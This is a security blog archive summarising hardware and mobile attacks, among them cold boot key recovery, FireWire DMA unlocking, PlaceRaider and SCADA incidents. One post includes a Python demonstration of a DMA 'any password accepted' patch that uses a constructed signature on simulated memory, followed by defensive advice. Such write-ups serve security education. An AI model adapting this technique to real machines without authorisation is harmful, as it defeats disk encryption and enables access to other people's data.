Category Archives: Security

FROST: Forensic Recovery Of Scrambled Telephones

A ready-to-go cold boot attack for the Galaxy Nexus!
Your Android PIN does not protect you once an attacker has the powered-on phone in hand.

We present FROST, a tool set that supports the forensic recovery of scrambled telephones. To this end we perform cold boot attacks against Android smartphones and retrieve disk encryption keys from RAM. We show for the first time that cold boot attacks against Android phones are generally possible, and we perform our attacks practically against Galaxy Nexus devices from Samsung. To break disk encryption, the bootloader must be unlocked before the attack because scrambled user partitions are wiped during unlocking. However, we show that cold boot attacks are more generic and allow retrieving sensitive information, such as contact lists, visited web sites, and photos, directly from RAM, even though the bootloader is locked.

Link.

Military IRC

Apparently the US Military uses IRC in a command and control context.
This was a big surprise to me!

A 2006 thesis from the Naval Postgraduate School states that internet relay chat (IRC) is one of the most widely used chat protocols for military command and control (C2). Software such as mIRC, a Windows-based chat client, or integrated systems in C2 equipment are used primarily in tactical conditions though efforts are underway to upgrade systems to newer protocols.

Breaking Full-Disk Encryption Using FireWire

There have been a number of proof-of-concept hacks that use IEEE 1394 (FireWire) devices' DMA access to host memory to elevate privileges on the host machine.
The most useful application of this technique is breaking into machines that use full-disk encryption while they are running or suspended, since the key is already in RAM. Now there is a tool that runs from any Unix-like host (Linux, OS X) and can unlock Windows XP, Vista, 7 and 8, OS X 10.6, 10.7 and 10.8, and Ubuntu on both x86 and x64 targets.

Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA. The tool can unlock (any password accepted) and escalate privileges to Administrator/root on almost any machine you have physical access to.

It is primarily intended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption. Inception is also useful for incident response teams and digital forensics experts when faced with live machines.

Link.
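Once a tool like Inception has DMA over FireWire, the rest is a memory search-and-patch: read physical pages, look for a byte signature of the OS password-check routine (with wildcards for bytes that vary between builds), and overwrite the branch that rejects a wrong password. The block below is an added example and is not Inception's code: the routine bytes and the signature are constructed for the demo, not real OS signatures, and the DMA read/write is simulated by working on an in-memory bytes image.

```python
# Added example: the search-and-patch half of a DMA "any password accepted" unlock.
# Not Inception's code; target routine, signature and memory image are constructed.
from __future__ import annotations

import random

# A signature is a tuple of byte values; None is a wildcard for bytes that differ
# between builds of the target (here: the relative jump displacement).
Signature = tuple

# Constructed stand-in for a password-check routine (x86-64); NOT a real OS signature.
#   8b 07             mov eax, [rdi]      ; stored hash
#   39 f0             cmp eax, esi        ; compare with supplied hash
#   75 05             jne fail
#   b8 01 00 00 00    mov eax, 1          ; success
#   c3                ret
#   31 c0             xor eax, eax        ; failure
#   c3                ret
FAKE_CHECK = bytes.fromhex("8b0739f07505b801000000c331c0c3")

# Match from the cmp onward and wildcard the jne displacement.
FAKE_SIGNATURE: Signature = (0x39, 0xF0, 0x75, None, 0xB8, 0x01, 0x00, 0x00, 0x00)
PATCH_OFFSET = 2            # position of the jne opcode inside the signature
PATCH_BYTES = b"\x90\x90"   # jne -> nop; nop, so the success path is always taken


def find_signature(image: bytes, sig: Signature, start: int = 0) -> int:
    """Return the offset of the first match of sig in image at or after start, or -1."""
    if not sig or sig[0] is None:
        raise ValueError("signature must start with a concrete byte")
    anchor = bytes([sig[0]])
    pos = image.find(anchor, start)
    while pos != -1 and pos + len(sig) <= len(image):
        if all(s is None or s == image[pos + k] for k, s in enumerate(sig)):
            return pos
        pos = image.find(anchor, pos + 1)
    return -1


def patch_image(image: bytes, offset: int, data: bytes) -> bytes:
    """Return a copy of image with data written at offset (simulates the DMA write)."""
    if offset < 0 or offset + len(data) > len(image):
        raise ValueError("patch lies outside the image")
    return image[:offset] + data + image[offset + len(data):]


def unlock(image: bytes, sig: Signature = FAKE_SIGNATURE,
           patch_at: int = PATCH_OFFSET, patch: bytes = PATCH_BYTES) -> tuple[int, bytes]:
    """Find the check routine and disable its failure branch; returns (offset, patched image)."""
    pos = find_signature(image, sig)
    if pos == -1:
        raise LookupError("signature not found; unsupported target build?")
    return pos, patch_image(image, pos + patch_at, patch)


def build_sample_image(size: int = 8192, seed: int = 7, routine_at: int = 4100) -> bytes:
    """Constructed stand-in for physical memory with the fake routine planted in it."""
    rng = random.Random(seed)
    filler = bytes(rng.getrandbits(8) for _ in range(size))
    return filler[:routine_at] + FAKE_CHECK + filler[routine_at + len(FAKE_CHECK):]


if __name__ == "__main__":
    image = build_sample_image()
    offset, patched = unlock(image)
    print(f"check routine matched at 0x{offset:x}; patched bytes: {patched[offset:offset + 9].hex()}")
```

The defensive reading of this is the check every laptop build should include: if the OS does not disable FireWire/Thunderbolt DMA (or enable the IOMMU) for the lock screen and S3 sleep, the patch above needs no credentials at all, only a cable.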

Android malware designed to build 3-D models of users’ apartments

An interesting article at FastCompany about PlaceRaider, an experimental smartphone trojan designed by Indiana University and the U.S. Navy. It’s Android malware designed to build 3-D models of users’ apartments.

PlaceRaider, which was summarized in a recent arXiv paper, is a piece of “visual malware” which uses smartphone cameras, accelerometers, and gyroscopes to reconstruct victims’ rooms and offices. As pictures are uploaded onto the central server, they are knitted together into a 3D model of the indoor location where the pics were taken.

Rise of “forever day” bugs in industrial systems

Ars Technica has an interesting article examining the effect of unpatched vulnerabilities in industrial control systems.
Specific mention is made of an exploit allowing remote code execution on robots that use some old ABB software.

According to an advisory (PDF) issued last week by the US Cyber Emergency Response Team, the flaw in ABB WebWare Server won’t be fixed even though it provides the means to remotely execute malicious code on computers that run the application.

Link.

SCADA Hack Destroys Mains Water Pump

“Hackers gained remote access into the control system of the city water utility in Springfield, Illinois, and destroyed a pump last week, according to a report released by a state fusion center and obtained by a security expert.”
Link.
